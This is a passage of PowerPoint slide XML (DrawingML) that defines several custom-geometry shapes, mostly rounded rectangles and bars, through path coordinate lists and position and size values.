                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247022" y="2524475"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844631" y="2519059"/>
            <a:ext cx="67500" cy="67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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4182972" y="2638494"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4247022" y="2699116"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1110521" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1110521" y="164183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="164183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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844631" y="2693701"/>
            <a:ext cx="67500" cy="67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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7337551" y="2746664"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7337551" y="2746664"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214214" y="3600838"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7214214" y="3600838"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407472" y="2816586"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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7407472" y="2816586"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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6096947" y="1459729"/>
            <a:ext cx="779907" cy="178108"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="516255" w="2260600">
                <a:moveTo>
                  <a:pt x="159366" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2100941" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2131367" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2175889" y="3294"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2213538" y="17224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2243083" y="46771"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2257012" y="84429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260186" y="129236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="160068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2260308" y="356418"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2259331" y="411073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2252496" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2229919" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2194477" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2155512" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2100229" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="515785"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104705" y="514808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="507974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="485390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="449944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="410984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="355706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="159366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976" y="104705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7809" y="65833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30389" y="30389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65833" y="7809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104793" y="976"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160068" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="159366" y="0"/>
                </a:lnTo>
                <a:close/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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6160997" y="1520351"/>
            <a:ext cx="383162" cy="56740"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="164464" w="1110615">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
